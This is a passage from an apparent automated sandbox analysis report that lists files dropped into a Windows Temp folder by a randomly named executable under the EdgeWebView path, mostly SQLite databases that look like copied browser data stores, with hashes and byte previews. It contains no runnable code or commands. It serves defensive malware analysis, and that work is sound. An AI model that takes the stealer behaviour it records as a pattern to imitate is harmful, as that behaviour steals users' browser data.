                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\NJicIjj9oF

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\NWz9aN1oqw

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\NYCXysrRZI

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\NuKv8kZVYe

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\O22wGUcciu

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Op2Cboi5JU

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\OpFKLcRSSK

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):98304
                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\PO7hjWvTgl

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\PVZZzOfSNu

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\PuU9kuPV1a

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\QOp2EUFLA4

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\QTb0V4pkbX

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\QfTbJjhphG

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\QrbyiZKjOo

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\RES8FF9.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Thu Dec 26 23:17:56 2024, 1st section name ".debug$S"
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1956
                                                                                                                          Entropy (8bit):4.543515791649884
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:HFO9/O4FmtDfHdswKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:Xomx9zKhmMluOulajfqXSfbNtmh1Z
                                                                                                                          MD5:A24A98651ED397AD004151A70BCC643F
                                                                                                                          SHA1:375DC3BB9B1708A1C08ADD4811A3E3C368AC8EC3
                                                                                                                          SHA-256:1DB574480269B25D3DF1CC8DAE683412DCF0803DD988E47929B19EC266E5DC44
                                                                                                                          SHA-512:FA173ABAD1D65F2C91D5B10C7442C9FA354CF5E628B4BF57ACD499ABA94B15D2DB89AB10C1EDDBCEDBBDD8EF95899D4866C350B48B443BE21E0887C06757EF2C
                                                                                                                          Malicious:false
                                                                                                                          Preview:L...$.mg.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC4943203AAE5A4E8090303227122B2EDA.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES8FF9.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                                                                                          C:\Users\user\AppData\Local\Temp\RYQjhf4s1V

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25
                                                                                                                          Entropy (8bit):4.403856189774723
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YMQrSn:Ycn
                                                                                                                          MD5:9CCA1AF69E2A7962A33558D736FADDB7
                                                                                                                          SHA1:239CDDBE5A3F59DCE5ADFAADE74D16013F7768F3
                                                                                                                          SHA-256:0DE88D17763F2CFC563E600D91F505FE17CB28D74102F002230EBBAE560698DB
                                                                                                                          SHA-512:7E7E1E9C8F31FBA202DE92DA0D60FDFE586673DF75B00E27F15E1DEAD857FEF91BFFB5AF5DFD61C28DD6F8FB854703E1316B737EB732339889FA9180D56F2B1B
                                                                                                                          Malicious:false
                                                                                                                          Preview:YlqLeYE6jwfuvBys8tcypkazE

                                                                                                                          C:\Users\user\AppData\Local\Temp\Rb3NQ0sNba

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\RhYwkGzHbf

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\RjbLmaigat

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Rz2aYxRGx5

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\S6r0Xhjlqv

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
